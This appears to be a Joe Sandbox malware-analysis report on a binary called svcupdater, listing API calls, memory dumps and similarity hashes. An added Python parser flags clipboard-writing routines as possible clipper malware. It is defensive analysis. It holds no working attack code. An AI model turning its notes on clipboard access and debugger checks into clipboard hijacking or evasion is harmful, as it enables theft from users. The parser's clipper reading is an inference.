                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: a4416a2c5c0dbe3d821fa3f2b4f1f774ecfab9b71017db3621f3829f5d278e5c
                                                                                                    • Instruction ID: 7b067d9808b6e71ed8b0f39333ab5d9d09303c97d7dc68f1ebbc89244dfb62f3
                                                                                                    • Opcode Fuzzy Hash: a4416a2c5c0dbe3d821fa3f2b4f1f774ecfab9b71017db3621f3829f5d278e5c
                                                                                                    • Instruction Fuzzy Hash: 83D06C3204010DFBDF028F84DC06EDA3BAAFB8C714F058000BA1856060C732E822AB90
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNELBASE(DEADBEEF,2F4C7F60), ref: 00BE3CBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: c9905dc23de92ac0b98c305eb191268de78ae055b00218517e64db7cdc5e685e
                                                                                                    • Instruction ID: 4acd15b69780632dce2a4d17a1831fdb33847e7bd42fa9d2ce1c0d5695273e35
                                                                                                    • Opcode Fuzzy Hash: c9905dc23de92ac0b98c305eb191268de78ae055b00218517e64db7cdc5e685e
                                                                                                    • Instruction Fuzzy Hash: 94F0B472944748EFCB10CF99DC41B9EBBB8FB45721F10422AE41593680D73415048694
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$AllocEmptyGlobalOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4230510986-0
                                                                                                    • Opcode ID: 3cc6dcf246a870ef29dd3f6509e862f3e963cc1ee4105d392749691153937ad2
                                                                                                    • Instruction ID: e70a63f7eb1709a2c3366dc98a30d5ae265050ceba51842436db91b7835c0014
                                                                                                    • Opcode Fuzzy Hash: 3cc6dcf246a870ef29dd3f6509e862f3e963cc1ee4105d392749691153937ad2
                                                                                                    • Instruction Fuzzy Hash: 3E21B371204944EFD7165F36EC8CBBE3BACFF86752B248594FA46C2241DB20D841C6A1
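The per-function records above are most useful when they can be pivoted on. What follows is an added example, not part of the Joe Sandbox report: a small parser for the layout of these blocks (the bullet list under "APIs" and the fields under "Similarity") that flags routines whose API ID names the clipboard-replacement combination (OpenClipboard, EmptyClipboard and GlobalAlloc are what a program calls immediately before SetClipboardData, so a routine using all three is rewriting clipboard contents, the behaviour expected of clipper malware) and returns their Instruction Fuzzy Hash for matching the same routine in other reports. The sample input is constructed from two entries on this page; the record split on the "APIs" heading and the CLIPBOARD_WRITE token set are my assumptions about the report layout, not a documented Joe Sandbox schema.

```python
import re
from typing import Dict, List, Set

# Constructed sample input, laid out like the per-function blocks of a Joe
# Sandbox report: an "APIs" list followed by the "Similarity" fields. The
# values are copied from two entries on this page (the WriteFile wrapper at
# 00C030D0 and the clipboard routine); the layout assumptions are mine.
SAMPLE_REPORT = """\
APIs
• WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00C03654,00000000,00000000,00000000,?,0000000C,00000000), ref: 00C0316C
• GetLastError.KERNEL32(?,00C03654,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,00C24240,00000010,00BFC6A2,00000000,00000000), ref: 00C03192
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
• Instruction Fuzzy Hash: 93219134A002599BCB19CF19DC80AEDB7FAEF4D301F2444AAEA46D7251D6309E46CB64
APIs
Similarity
• API ID: Clipboard$Close$AllocEmptyGlobalOpen
• String ID:
• API String ID: 4230510986-0
• Instruction Fuzzy Hash: 3E21B371204944EFD7165F36EC8CBBE3BACFF86752B248594FA46C2241DB20D841C6A1
"""

# "• Name.MODULE(args), ref: ADDRESS" as printed under "APIs".
API_CALL = re.compile(r"^•\s*(\w+)\.([A-Z0-9]+)\((.*)\),\s*ref:\s*([0-9A-F]{8})$")
# "• Field: value" as printed under "Similarity" (the value may be empty).
FIELD = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")


def parse_records(text: str) -> List[Dict]:
    """Split the report text into one record per function block."""
    records: List[Dict] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # assumption: every block opens with its API list
            current = {"apis": [], "fields": {}}
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue
        call = API_CALL.match(line)
        if call:
            current["apis"].append(
                {"name": call.group(1), "module": call.group(2), "ref": call.group(4)})
            continue
        field = FIELD.match(line)
        if field:
            current["fields"][field.group(1)] = field.group(2)
    return records


def api_id_tokens(api_id: str) -> Set[str]:
    """Break an API ID such as "Clipboard$Close$AllocEmptyGlobalOpen" into its
    capitalised fragments; the "$" separators and their order are ignored."""
    return set(re.findall(r"[A-Z][a-z]*", api_id))


# OpenClipboard, EmptyClipboard and GlobalAlloc precede SetClipboardData in
# any code that replaces the clipboard; an API ID naming all of them marks a
# clipboard writer. The token set is an assumption for this example.
CLIPBOARD_WRITE = {"Clipboard", "Open", "Empty", "Alloc"}


def find_clipboard_writers(records: List[Dict]) -> List[str]:
    """Return the Instruction Fuzzy Hash of every record whose API ID covers
    CLIPBOARD_WRITE, for pivoting to the same routine in other reports."""
    hits = []
    for record in records:
        tokens = api_id_tokens(record["fields"].get("API ID", ""))
        if CLIPBOARD_WRITE <= tokens:
            hits.append(record["fields"]["Instruction Fuzzy Hash"])
    return hits


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for r in recs:
        print(r["fields"].get("API ID"), [a["name"] for a in r["apis"]])
    print("clipboard writers:", find_clipboard_writers(recs))
```

Feeding the whole report text to parse_records instead of the constructed sample gives one record per function block; the second record in the sample shows the case where the "APIs" list is empty and only the Similarity fields carry the signal.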
                                                                                                    APIs
                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C0D946,00000002,00000000,?,?,?,00C0D946,?,00000000), ref: 00C0D6C1
                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00C0D946,00000002,00000000,?,?,?,00C0D946,?,00000000), ref: 00C0D6EA
                                                                                                    • GetACP.KERNEL32(?,?,00C0D946,?,00000000), ref: 00C0D6FF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
• Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 2299586839-711371036
                                                                                                    • Opcode ID: 5297c558ba05899e8a13a6b5e12223c67324e54915379a090fe6674fddac9bbc
                                                                                                    • Instruction ID: 53f7bd04741f783c81cb8cb76b05e9d33fd5c11e496497724083c07cb570da66
                                                                                                    • Opcode Fuzzy Hash: 5297c558ba05899e8a13a6b5e12223c67324e54915379a090fe6674fddac9bbc
                                                                                                    • Instruction Fuzzy Hash: 4821D0A2A00104EADB308F99D905B9773A6AF50B60B578864F92FCB184F733DF40D750
                                                                                                    APIs
                                                                                                      • Part of subcall function 00C02340: GetLastError.KERNEL32(?,00000008,00C09A39), ref: 00C02344
                                                                                                      • Part of subcall function 00C02340: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00C023E6
                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C0D909
                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00C0D952
                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C0D961
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C0D9A9
                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C0D9C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 415426439-0
                                                                                                    • Opcode ID: 856b0fbc22be9c6589ff9aa1726263dbd68f4cffdb0e027c8072433e3c0aa1c9
                                                                                                    • Instruction ID: edd734900cf7d98efb54605afda9f6408138359a2a1f6e629c94581ff8e05b3b
                                                                                                    • Instruction Fuzzy Hash: 74516B72A00609ABEF10DFE5DC45BBEB7B8BF45700F184569E916EB1D0EB709A40DB60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 3213747228-0
                                                                                                    • Opcode ID: e030b2298e0d9f9cb91cf1a70554882ac09d070c00e7bb26036b4e9e32c17164
                                                                                                    • Instruction ID: 9c003af68e8204f75ab2096efc2b2c0b9682b1516ce20027538d37d024b06d37
                                                                                                    • Instruction Fuzzy Hash: 3AB13972D042969FDB158F68C8817EEBBB9EF59300F1441AAE925EB2C1D2359F41CB60
                                                                                                    APIs
                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00C0A2E1
                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C0A3D5
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00C0A414
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00C0A447
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFile$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1164774033-0
                                                                                                    • Opcode ID: f5fdb1ed76ed68398d899689049ae6dca183c1caa8a0129c5f3a1af59c0048ca
                                                                                                    • Instruction ID: 4d902f7e2d92e5ab12d5700ab2b049a0936b9aa6c3bb6a86a8375c4bec39bbc0
                                                                                                    • Instruction Fuzzy Hash: 5B7105B58052589FDF21EF68CC89BEEBBB9AB06300F1441E9E01D97291DA358F85DF11
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BF5B76
                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00BF5C42
                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BF5C62
                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00BF5C6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                    • String ID:
                                                                                                    • API String ID: 254469556-0
                                                                                                    • Opcode ID: abb5eca4b1209f2a6ae0ade72250f29579333ba22448c0206838691ea23ea922
                                                                                                    • Instruction ID: 4cd912da9cdb3b5279d97cb7d3e680e981bd2fb40da6ab93130f1e53f3798770
                                                                                                    • Instruction Fuzzy Hash: CB31067590521CDBDB20DFA4D989BDCBBF8FF08300F1041EAE509AB250EB705A888F44
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE9429
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE9475
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE954D
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE95E2
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE9607
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE960C
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BE9611
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Concurrency::cancel_current_task$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name$false$true
                                                                                                    • API String ID: 3559308103-1062449267
                                                                                                    • Opcode ID: 90a2d750530cb1269147bb3b2f48b989a3e56376366b0eca6fa8f3b8c4f6e53e
                                                                                                    • Instruction ID: e061036fecd1ceac8ab117411f6f7cbeb58bbae70897865fd6b26c430c9e1fac
                                                                                                    • Instruction Fuzzy Hash: 38718FB0D013489FEF20DFA5D9457AEBBF4EF14300F1440AAE915A7382E7B59A49CB51
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8966
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8988
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89A8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE89CF
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8A48
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE8A94
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE8AAE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8B43
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8B50
                                                                                                      • Part of subcall function 00BF41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF41DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1592514138-1405518554
                                                                                                    • Opcode ID: 2b969e888947c91095f758c3941891c7ca0bb4289b0cf4f5bed228764dd74c6c
                                                                                                    • Instruction ID: af172d1ce58373b666429ad04da9e3c44dc74845430e2956a7ab208fef0568cc
                                                                                                    • Instruction Fuzzy Hash: C3618FB0D00648DFDF20DFA5D941BAEBBF4EF04314F1440A9E909A7352EB75A909CBA1
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8BB6
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8BD8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8BF8
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8C1F
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE8C98
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE8CE4
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE8CFE
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE8D93
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BE8DA0
                                                                                                      • Part of subcall function 00BF41D0: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00BF41DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1592514138-1405518554
                                                                                                    • Opcode ID: dfdcf548bd5e82a901a172d9028747c43c1e808e0c74a71dd580d3ee992db996
                                                                                                    • Instruction ID: 150dd095d88aa23890ea342b7c61d90354366c8d5a9f5875ea3e09eb602c8726
                                                                                                    • Instruction Fuzzy Hash: 5661A2B0D01648DFDF11DFA5D941BAEBBF4EF14310F1440A9E909A7382DB74A949CBA1
                                                                                                    APIs
                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00BF8C29
                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00BF8D37
                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00BF8E89
                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00BF8EA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                    • String ID: csm$csm$csm
                                                                                                    • API String ID: 2751267872-393685449
                                                                                                    • Opcode ID: 9665d4e740242b79c7daa82eb55fd037475ee2ab240ea6c0a4c837e9b8bbd32a
                                                                                                    • Instruction ID: 2de52543908824d741efa72b9ee96754a11191d6a3aa56b021f2b4881bebab0a
                                                                                                    • Instruction Fuzzy Hash: AFB1597680020DEFCF19EF94C8819BEBBF5FF14310B1445AAEA146B252DB31DA59CB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000023.00000002.2993041426.0000000000BE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                    • Associated: 00000023.00000002.2992784255.0000000000BE0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993389432.0000000000C15000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993716798.0000000000C25000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                    • Associated: 00000023.00000002.2993923748.0000000000C27000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_35_2_be0000_svcupdater.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3907804496
                                                                                                    • Opcode ID: c2b87182cdc72c83432c1eb9a2bdcd23cc82e9fb320f693136b682c56e3d0c1b
                                                                                                    • Instruction ID: 37687154bfa88050aaf481e358c2978cf0a87404d53066f76e74c710b012da3c
                                                                                                    • Opcode Fuzzy Hash: c2b87182cdc72c83432c1eb9a2bdcd23cc82e9fb320f693136b682c56e3d0c1b
                                                                                                    • Instruction Fuzzy Hash: D6B1F374E0428AAFDB15DF99D880BBD7BB1BF45314F148158E5209B2D1C7709E56CFA0
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED9FD
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BEDA50
                                                                                                    • __Getcoll.LIBCPMT ref: 00BEDA62
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BEDA81
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BEDB16
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetcollLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1629477862-1405518554
                                                                                                    • Opcode ID: 835270553a822eb4c9480709b0fa969f20f2274bff7299ae748a3d841343a699
                                                                                                    • Instruction ID: 4623c30c7cdfac5ca313501e133fcb900ba50a70c14ca4a7d214259e0a6d4e5e
                                                                                                    • Opcode Fuzzy Hash: 835270553a822eb4c9480709b0fa969f20f2274bff7299ae748a3d841343a699
                                                                                                    • Instruction Fuzzy Hash: 6B61C4B1D002489BEF10DFA9D9857DEBBF4EF04310F1445A9E915E7382E7B49A48CB91
                                                                                                    APIs
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BE3663
                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00BE36AF
                                                                                                    • __Getctype.LIBCPMT ref: 00BE36C8
                                                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00BE36E4
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BE3779
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                    • String ID: bad locale name
                                                                                                    • API String ID: 1840309910-1405518554
                                                                                                    • Opcode ID: 37564be05ffebdafdce5fd8c443677a09189bd42d41cdca25d5b4e49afff4a2c
                                                                                                    • Instruction ID: cac55efa41e184624fa6196ae2d0e3430d8ddfddc1b29e855e949f645e7d4dd2
                                                                                                    • Opcode Fuzzy Hash: 37564be05ffebdafdce5fd8c443677a09189bd42d41cdca25d5b4e49afff4a2c
                                                                                                    • Instruction Fuzzy Hash: C451A1F1D0028CABEF10DFA5D945B9EBBF8EF14700F144169E905A7242E775AA48C791
                                                                                                    APIs
                                                                                                    • OpenClipboard.USER32(00000000), ref: 00BE2CB4
                                                                                                    • GetClipboardData.USER32(00000001), ref: 00BE2CC0
                                                                                                    • CloseClipboard.USER32 ref: 00BE2CCC
                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BE2CFA
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BE2D3F
                                                                                                    • CloseClipboard.USER32 ref: 00BE2D49
                                                                                                    • CloseClipboard.USER32 ref: 00BE2DAB
                                                                                                    Similarity
                                                                                                    • API ID: Clipboard$Close$Global$DataLockOpenUnlock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3729548305-0
                                                                                                    • Opcode ID: 2bc3f29b52e439b50d9ac548bd7e6b173236a76083e33b9b55a2be6ce439658c
                                                                                                    • Instruction ID: 902fa2c8762e7f75110d17796a47c5ffecda16be57854be430ce225b06b70098
                                                                                                    • Opcode Fuzzy Hash: 2bc3f29b52e439b50d9ac548bd7e6b173236a76083e33b9b55a2be6ce439658c
                                                                                                    • Instruction Fuzzy Hash: 6A412670A006849BD7199F75CC497AEB7F9FF89710F20835DF446A6681DBB095C0CB90
                                                                                                    APIs
                                                                                                    • std::locale::_Init.LIBCPMT ref: 00BED045
                                                                                                      • Part of subcall function 00BF4400: __EH_prolog3.LIBCMT ref: 00BF4407
                                                                                                      • Part of subcall function 00BF4400: std::_Lockit::_Lockit.LIBCPMT ref: 00BF4412
                                                                                                      • Part of subcall function 00BF4400: std::locale::_Setgloballocale.LIBCPMT ref: 00BF442D
                                                                                                      • Part of subcall function 00BF4400: _Yarn.LIBCPMT ref: 00BF4443
                                                                                                      • Part of subcall function 00BF4400: std::_Lockit::~_Lockit.LIBCPMT ref: 00BF4483
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED05C
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BED07E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED09E
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BED0CC
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00BED143
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00BED15D
                                                                                                    Similarity
